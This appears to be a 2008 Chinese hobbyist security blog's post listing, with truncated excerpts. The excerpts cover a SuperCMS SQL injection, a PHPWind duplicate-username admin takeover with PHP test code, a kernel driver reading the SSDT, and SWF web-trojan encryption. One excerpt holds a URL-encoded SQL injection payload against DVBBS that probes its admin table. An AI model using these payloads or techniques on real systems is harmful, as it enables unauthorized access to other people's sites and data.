2008-07-13 17:53
貌似没什么用
<%@ LANGUAGE = VBScript.Encode %>
<%#@~^EAAAAA==@#@&frsPjlDk@#@&BAMAAA==^#~@%>
<p> </p>
<p> </p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><strong>A list of all server
variables : </strong> </font></p>
<p><BR>
<B |
2008-07-07 14:05
转自wolffly 's blog
SuperCMS新闻文章内容管理系统是一套免费的ASP系统。目前很多高校和政府的二级网站都在用。产生漏洞的页面是 SuperCMS.asp
if not isEmpty(request("typeid")) then
typeid=request("typeid")
else
typeid=1
end if
if not isempty(request("page")) then
currentPage=cint(request("page"))
|
2008-07-07 10:57
2008-06-28 13:49
atapi dispatch地址和SSDT列表的地址是通过Ring3动态获取然后写入驱动再重新校验,这里我加了自己的代码,改了下,Ring0下实现
转自邪八
#include<ntddk.h>
#include<stdio.h>
ULONG * realssdt;
#define SEC_IMAGE 0x01000000
#pragma pack(1)
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
|
2008-06-20 19:02
不知道这个过了有没有用
|
2008-06-20 15:37
2008-06-13 15:16
今天法律期末考试,差点没把我郁闷死。虽说是开卷吧,但大多数题书上都没有。
那堆案例分析的题基本就纯靠瞎扯,用小学生的逻辑评论一番^_^就看判卷老师怎么搞喽~~~
|
2008-06-03 15:58
漏洞原因是Mysql会舍弃没有用处的ASCII129-255,搜了资料也没有找到为什么,PW最大失误不是程序,而是没有把username设为唯一。
可以构造一个和某个管理人员名字一样的ID再加上一个无效的ASCII码进行注册,表中会出现二个一样的用户名,而forums.forumadmin字段里存的用户名,这样就可获得全部的前台权限。
使用PHP构造的测试代码。
<?php
if (empty($_GET['sub'])) {
print <<<EOT
|
2008-06-03 15:54
漏洞公告: http://seclists.org/bugtraq/2008/May/0330.html
利用方式: 一个典型的sql注射漏洞,按照公告里说的用
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271
就可触发.
漏洞分析:动 |
2008-06-03 15:51
从生成器逆向探寻SWF网马加密
作者:Raullen
Adobe Flash漏洞是这段时间的明星漏洞,大街小巷都闹的沸沸扬扬。但除了各别“吃草的”懂得个中奥妙,大多数的马迷们只能望马心叹,及时抓到了16、28、45、47、115等各个版本的恶意SWF也是无从下手。这是因为这个网马不同于传统货,并不以unescape,16进制这些字符串表达形式的变换来取悦于观众,因为溢出构造在Flash内部,赋予了制作者以更多的操作空间,可以通过编程来实现比较复杂的Shellcode加密。这也许也是将来网马的发展方向所在。
今日,在某大侠的 |
|
|
zrxc
男, 16岁
北京 宣武区
上次登录:
4天前
 加为好友
|
给他留言
发送消息
